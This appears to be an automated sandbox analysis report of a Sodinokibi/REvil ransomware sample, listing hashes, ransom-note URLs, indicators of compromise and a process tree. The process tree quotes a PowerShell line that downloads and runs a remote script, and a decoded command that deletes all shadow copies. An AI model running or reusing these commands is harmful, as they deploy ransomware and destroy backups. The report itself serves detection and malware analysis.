Analysis
max time kernel: 135s
max time network: 143s
platform: windows7_x64
resource: win7v200430
submitted: 15-05-2020 19:19
Static task: static1
Behavioral task: behavioral1
  Sample: b692cd395a2db4aacd53de584ee06ea0.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: b692cd395a2db4aacd53de584ee06ea0.bat
  Resource: win10v200430
General
Target: b692cd395a2db4aacd53de584ee06ea0.bat
Size: 215B
MD5: 7b613efb2eb2240a79c12ff83b16d370
SHA1: c74e994acea6c088e0590c14a99ccada44dd7c12
SHA256: ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e
SHA512: 7242a8a1d96558ffbc16b91b9a1dbd25a60396da43c9d46b0a57eecceee262bdde40cd44c507a122ee9567882de40c1c75514048b241e62181c0e5a67ea72024
Malware Config
Extracted
  URL: http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0
Extracted
  Path: C:\58f8ai-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5BF4A84C842F97B
    http://decryptor.cc/B5BF4A84C842F97B
Signatures

Drops file in Program Files directory 28 IoCs
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\SkipEnable.pptm | powershell.exe
File opened for modification | \??\c:\program files\RepairStep.dwfx | powershell.exe
File opened for modification | \??\c:\program files\RequestHide.xhtml | powershell.exe
File created | \??\c:\program files\58f8ai-readme.txt | powershell.exe
File created | \??\c:\program files (x86)\58f8ai-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\DisableSplit.docm | powershell.exe
File opened for modification | \??\c:\program files\SubmitDeny.ps1xml | powershell.exe
File opened for modification | \??\c:\program files\TestOut.vsx | powershell.exe
File opened for modification | \??\c:\program files\AddStep.vstx | powershell.exe
File opened for modification | \??\c:\program files\CompleteSelect.mp4 | powershell.exe
File opened for modification | \??\c:\program files\EnableStep.wmv | powershell.exe
File opened for modification | \??\c:\program files\SelectReceive.jtx | powershell.exe
File opened for modification | \??\c:\program files\ResetSend.gif | powershell.exe
File opened for modification | \??\c:\program files\ResetSet.zip | powershell.exe
File opened for modification | \??\c:\program files\StepMerge.nfo | powershell.exe
File opened for modification | \??\c:\program files\UpdateSearch.MTS | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\58f8ai-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\BackupCopy.easmx | powershell.exe
File opened for modification | \??\c:\program files\CompareInstall.jpg | powershell.exe
File opened for modification | \??\c:\program files\ResetUse.odt | powershell.exe
File opened for modification | \??\c:\program files\ShowUnprotect.mov | powershell.exe
File opened for modification | \??\c:\program files\UnregisterWrite.js | powershell.exe
File opened for modification | \??\c:\program files\AddUse.xla | powershell.exe
File opened for modification | \??\c:\program files\UseAssert.xlt | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\58f8ai-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\AssertRedo.dxf | powershell.exe
File opened for modification | \??\c:\program files\EnterLimit.mhtml | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\58f8ai-readme.txt | powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\s9ht8xjik234c.bmp" | powershell.exe

Modifies system certificate store
Processes: powershell.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = … | powershell.exe
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives 3 TTPs

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes: powershell.exe
pid | process
784 | powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes: powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 784 | powershell.exe
Token: SeDebugPrivilege | 784 | powershell.exe
Token: SeDebugPrivilege | 1884 | powershell.exe
Token: SeBackupPrivilege | 1556 | vssvc.exe
Token: SeRestorePrivilege | 1556 | vssvc.exe
Token: SeAuditPrivilege | 1556 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 784 | powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes: powershell.exe
pid | process
784 | powershell.exe
784 | powershell.exe
784 | powershell.exe
1884 | powershell.exe
1884 | powershell.exe

Blacklisted process makes network request 83 IoCs
Processes: powershell.exe
pid 784 powershell.exe, flows: 2, 6, 8, 10, 11, 13, 14, 16, 18, 20, 22, 23, 25, 26, 28, 29, 31, 33, 34, 36, 38, 40, 42, 44, 46, 47, 50, 52, 53, 55, 57, 59, 60, 62, 64, 66, 68, 69, 71, 73, 74, 77, 79, 80, 82, 83, 85, 86, 88, 90, 91, 93, 95, 97, 99, 101, 102, 104, 105, 107, 108, 110, 111, 113

Modifies service 2 TTPs 4 IoCs
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe

Drops file in System32 directory 1 IoCs
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 676 wrote to memory of 784 | 676 | cmd.exe | powershell.exe
PID 784 wrote to memory of 1884 | 784 | powershell.exe | powershell.exe
PID 784 wrote to memory of 1884 | 784 | powershell.exe | powershell.exe
PID 784 wrote to memory of 1884 | 784 | powershell.exe | powershell.exe
PID 784 wrote to memory of 1884 | 784 | powershell.exe | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\b692cd395a2db4aacd53de584ee06ea0.bat"
  PID: 676
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0');Invoke-IKBCFDVD;Start-Sleep -s 10000"
    PID: 784
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Modifies system certificate store
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -e argument (base64 of UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}  (deletes all volume shadow copies, which is what triggers the vssvc.exe activity below)
      PID: 1884
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1556
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service